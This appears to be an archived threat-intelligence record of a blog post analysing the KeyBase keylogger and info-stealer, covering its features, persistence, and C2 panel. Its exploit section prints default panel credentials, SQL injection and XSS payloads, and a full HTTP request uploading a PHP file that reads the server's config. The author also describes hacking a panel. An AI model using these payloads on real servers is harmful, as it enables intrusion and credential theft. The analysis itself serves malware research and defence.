{
	"id": "a9133bf6-0019-45d2-b64c-f3621c987489",
	"created_at": "2026-04-06T01:32:31.273047Z",
	"updated_at": "2026-04-10T03:21:58.507124Z",
	"deleted_at": null,
	"sha1_hash": "157f0d8d55f4207d98eff37c814325070fb8a4a3",
	"title": "Keybase",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1612527,
	"plain_text": "Keybase\r\nBy voidsec\r\nPublished: 2016-01-28 · Archived: 2026-04-06 00:15:41 UTC\r\nRecently, a malware known as KeyBase has been “triggering” some of my sensors. KeyBase was first distributed in February 2015 and sold for about $50 (in its first version). It remained active until May and then disappeared from the internet. In November it came back with thousands of infections (v1.5).\r\nKeyBase is a malware with limited capabilities belonging to the keylogger and info-stealer families.\r\nMalware Overview\r\nKeyBase is written in C# and among its features we can find:\r\nKeylogging\r\nHotLogging (keylogging of specific windows, e.g. PayPal, bank accounts, etc.)\r\nPassword stealer\r\nBrowsers (Chrome, Firefox, Internet Explorer, Opera, Safari)\r\nEmail clients (Outlook, Thunderbird, Incredimail, Netscape, Eudora)\r\nGeneral purpose software (FileZilla, JDownloader, IDM, Imvu, PalTalk)\r\nTaking screenshots of the entire screen or of specific windows\r\nStealing the contents of the clipboard\r\nAbility to block certain websites\r\nVisiting a website at malware startup\r\nSelf-destruction upon reaching a specific date\r\nhttps://voidsec.com/keybase-en/\r\nPage 1 of 9\n\nCode Analysis\r\nThe code is not particularly difficult to read as it is not obfuscated; it also contains the command and control server information hard-coded in the source.\r\nWithin the resources of the compiled program you can locate a key that appears unique to each build performed on the same machine.\r\nThe author has applied a number of simple obfuscation techniques to the strings used in the code, mainly “replace” and “reverse” operations on characters and strings; in addition to these operations, all the Microsoft Windows API calls are encrypted.\r\nMalware persistence is obtained by copying the executable into the Startup folder under the name Important.exe (visible in the first block of code). This value cannot be changed by the builder and is statically set in the source code. It also sets a key value in the registry as follows:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run {32 byte}:{exe path}\r\nCommand and Control \u0026 Web Panel\r\nThe most interesting part, especially given the poor quality of the code, is the web interface.\r\nAll communications with the remote server are performed via simple HTTP requests and are not encrypted.\r\nKeyBase sends a notification to the remote server once it has been installed. Note the absence of certain HTTP headers in the request.\r\nThe web control panel gives you control over all the information stolen from the infected machines, as seen in the following image.\r\nExploit\r\nDefault credentials for the web panels are: Admin:Admin, KeyBase:Logs123!\r\nAnalyzing the source code of the web panel, you can identify multiple vulnerabilities:\r\nPost.php is vulnerable to SQL injection (error-based and blind) and cross-site scripting (XSS) because the “machinename”, “windowtitle”, “keystrokestyped” and “machinetime” parameters are not filtered in any way.\r\nSqlmap:\r\nParameter: machinename (GET)\r\nType: error-based\r\nTitle: MySQL \u003e= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause\r\nPayload: machinename=1' AND (SELECT 5650 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(5650=5\r\nType: AND/OR time-based blind\r\nTitle: MySQL \u003e= 5.0.12 AND time-based blind (SELECT)\r\nPayload: machinename=1' AND (SELECT * FROM (SELECT(SLEEP(5)))GRmL) AND 'mEfO'='mEfO\u0026windowtitle=a\u0026key\r\nXSS:\r\nGET /keybase/post.php?keystrokestyped=a'\"\u003cscript\u003ealert('VoidSec')\u003c/script\u003e\u0026machinename=1\u0026machinetime=\r\nThe session cookie is set without the HttpOnly flag, allowing session hijacking through the previous XSS vulnerability.\r\nBy default, the directory “/image/Images” (destination of the screenshots) does not require authentication, allowing anyone to see the images stored on the server.\r\nUpload.php does not perform any validation on the uploaded file, allowing a third party to upload a PHP script which can compromise the entire C\u0026C server.\r\nYou may also notice that the author forgot the renaming of the uploaded files: the function designed for this purpose is never called.\r\nBy submitting the following request, you can upload a PHP file that reads the username and password of the web interface from config.php.\r\nExploit:\r\nPOST /image/upload.php HTTP/1.1\r\nHost: $$VULNERABLE_HOST$$\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------------------------34593197730004\r\nContent-Length: 394\r\n\r\n-----------------------------34593197730004\r\nContent-Disposition: form-data; name=\"file\"; filename=\"NUBO_12_21_16_48_4.jpg.php\"\r\nContent-Type: application/octet-stream\r\n\r\n\u003c?php $file = '../../config.php'; echo file_get_contents($file); ?\u003e\r\n-----------------------------34593197730004\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload\r\n-----------------------------34593197730004--\r\nMalware Distribution \u0026 Targets\r\nKeyBase seems to be used to infect devices in over 41 countries, including: Bosnia and Herzegovina, India, Iran, Jordan, Philippines, Serbia, Thailand, United States of America, Viet Nam.\r\nIts incidence is most relevant in Iran, which accounts for 45% of the infected devices.\r\nSome of the infected machines are used in the following sectors: industrial, high tech, private medical offices, higher education, retail, government agencies, as well as ordinary home computers.\r\nAmong the bulk of the collected information, while hacking one of the web panels, I was able to discover some files regarding the creation of a new ransomware. I “dumped” all the back-end source code and I am currently monitoring the server, trying to retrieve some samples or the source code of the executable.\r\nBut that’s another story...\r\nConclusions\r\nFinally, although KeyBase lacks a few options (Download \u0026 Execute, Update) that are common in the current malware landscape and appears unsophisticated (unencrypted communication, minimal obfuscation), its ease of use, low detection rate and simplicity by design make it a useful base for further development and/or as the payload of a crypter, allowing the evasion of the most common anti-virus products.\r\nSource: https://voidsec.com/keybase-en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://voidsec.com/keybase-en/"
	],
	"report_names": [
		"keybase-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775439151,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/157f0d8d55f4207d98eff37c814325070fb8a4a3.pdf",
		"text": "https://archive.orkl.eu/157f0d8d55f4207d98eff37c814325070fb8a4a3.txt",
		"img": "https://archive.orkl.eu/157f0d8d55f4207d98eff37c814325070fb8a4a3.jpg"
	}
}